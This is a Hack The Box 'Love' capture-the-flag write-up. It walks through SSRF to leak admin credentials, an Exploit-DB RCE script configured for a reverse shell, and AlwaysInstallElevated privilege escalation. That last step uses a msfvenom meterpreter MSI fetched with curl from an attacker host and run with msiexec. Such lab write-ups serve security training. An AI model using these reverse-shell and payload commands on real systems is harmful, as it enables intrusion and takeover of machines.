HTB Love Writeup (ENG)


#HTB Writeup Hack Windows English

2021 Oct 05: 17:25

Enumeration

We can add the 10.10.10.239 love.htb line to our /etc/hosts file to make our job easier. First we need to scan the victim for example with nmap. nmap -sCV -T4 -p love.htb

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
432/tcp closed iasd443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1 PHP/7.3.27)
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1 PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Now we have to scan the port 80 for subdomains. We can find a subdoamin what is staging.love.htb. We have to add it to our /etc/hosts file like we did before. On this subdomain there is a Demo button what redirect us to the beta.php file. There is a file scanner, what checks the url what we give. On the http://love.htb:5000 we get permission denied, what means we can try to load this webpage on the file scanner with ssrf.

Geting User

We need to give the http://localhost:5000 url to the input field.Now we have access to the port 5000 and we can see the admin's credentials and we can login in the http://love.htb/admin/ page with these credentials. With the voting system's administrator account we can use an RCE vulnerability. On exploitdb there is a PoC script. After the download we need to change some thing before we run it. The begin of the script should looks like this:

IP = love.htb # Website's
URLUSERNAME = admin #Auth username
PASSWORD = @LoveIsInTheAir!!!! # Auth Password
REV_IP = 10.10.14.209 # Reverse shell
IPREV_PORT = 4343# Reverse port
# --------------------------------
INDEX_PAGE = fhttp://{IP}/admin/index.php
LOGIN_URL = fhttp://{IP}/admin/login.php
VOTE_URL = fhttp://{IP}/admin/voters_add.php
CALL_SHELL = fhttp://{IP}/images/shell.php

We need to start a tcp listener like rlwrap nc -lvnp 4343 . After this run the script and in the listener as we can see we've got a reverse shell as phoebe. In the C:\Users\Phoebe\Desktop directory there is the user.txt.We can read with the type user.txt command.

Rooting

We have to check privileges to install .msi packages.The necessary commands:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

In the both output we see a 0x1 part, thus we have privilege to install .msi package. Now we have to generate a reverse shell with msfvenom and start a listener with msfconsole. To generate the reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f msi > shell.msi

When it's done we have to move the program to the victim's machine, for example with python3. In the directory where's the shell.msi filepython3 -m http.server 8080 . In the reverse shell we need to download it and run it.

curl http://<ATTACKER_IP>:8080/shell.msi -o shell.msi

The next thing is the listening with msfconsole on our local machine.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <ATTACKER_IP>
set lport 4444
exploit

Now go back to the reverse shell as phoebe and run the .msi file like:

msiexec /quiet /qn /i shell.msi

In the msf listener we shall see something like this:

[*] Started reverse TCP handler on 10.10.14.209:4241
[*] Sending stage (175174 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.14.209:4241 -> 10.10.10.239:63558) at 2021-06-01 17:41:54 +0200
meterpreter >

With the getuid command we can see our user is NT AUTHORITY\SYSTEM thus we have permission to read the root.txt.This file is located in the C:\Users\Administrator\Desktop directory.

Happy hacking!